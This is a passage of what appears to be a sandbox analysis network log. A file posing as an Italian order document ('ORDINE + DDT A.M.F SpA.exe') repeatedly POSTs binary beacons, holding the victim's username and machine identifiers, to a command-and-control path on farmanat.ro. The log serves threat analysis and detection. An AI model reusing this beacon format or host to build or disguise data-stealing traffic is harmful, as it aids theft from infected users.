Nov 25, 2021 10:49:28.491888046 CET	6530	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:27 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
153	192.168.11.20	49994	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:28.926177979 CET	6531	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:28.960627079 CET	6531	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:29.014986992 CET	6531	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:28 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
154	192.168.11.20	49995	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:29.395169020 CET	6532	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:29.428569078 CET	6532	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:29.493921041 CET	6533	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:28 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
155	192.168.11.20	49996	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:29.871512890 CET	6533	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:29.905167103 CET	6534	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:29.953989983 CET	6534	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:28 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
156	192.168.11.20	49997	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:30.393507004 CET	6535	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:30.427990913 CET	6535	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:30.483016968 CET	6535	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:29 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
157	192.168.11.20	49998	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:30.922836065 CET	6536	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:30.956326962 CET	6536	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:31.011261940 CET	6537	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
158	192.168.11.20	49999	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:31.432080984 CET	6537	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:31.466260910 CET	6538	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:31.517405033 CET	6538	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
159	192.168.11.20	50000	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:31.950901031 CET	6539	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:31.984535933 CET	6539	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:32.039340973 CET	6539	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:31 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.11.20	49851	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:11.469665051 CET	6327	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:11.503652096 CET	6328	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:11.553739071 CET	6328	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:10 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
160	192.168.11.20	50001	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:32.411503077 CET	6540	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:32.444843054 CET	6540	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:32.494329929 CET	6541	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:31 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
161	192.168.11.20	50002	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:32.838212013 CET	6541	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:32.871723890 CET	6542	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:32.929130077 CET	6542	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:31 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
162	192.168.11.20	50003	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:33.371009111 CET	6543	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:33.405335903 CET	6543	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:33.455444098 CET	6543	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:32 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
163	192.168.11.20	50004	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:33.891068935 CET	6544	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:33.924673080 CET	6544	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:33.998054981 CET	6545	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:32 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
164	192.168.11.20	50005	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:34.420368910 CET	6545	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:34.454618931 CET	6546	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:34.506170988 CET	6546	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:33 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
165	192.168.11.20	50006	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:34.921608925 CET	6547	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:34.955773115 CET	6547	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:35.006596088 CET	6547	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:34 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
166	192.168.11.20	50007	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:35.381644964 CET	6548	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:35.415180922 CET	6548	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:35.470386028 CET	6549	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:34 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
167	192.168.11.20	50008	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:35.899719000 CET	6549	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:35.933382034 CET	6550	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:35.990776062 CET	6550	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:34 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
168	192.168.11.20	50009	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:36.430850029 CET	6551	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:36.465001106 CET	6551	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:36.515178919 CET	6551	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:35 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
169	192.168.11.20	50010	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:36.941066980 CET	6552	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:36.975271940 CET	6552	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:37.025207996 CET	6553	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:36 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.11.20	49852	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:12.137739897 CET	6329	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:12.172027111 CET	6329	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:12.222152948 CET	6329	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:11 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
170	192.168.11.20	50011	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:37.484066010 CET	6553	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:37.518367052 CET	6554	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:37.573867083 CET	6554	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:36 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
171	192.168.11.20	50012	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
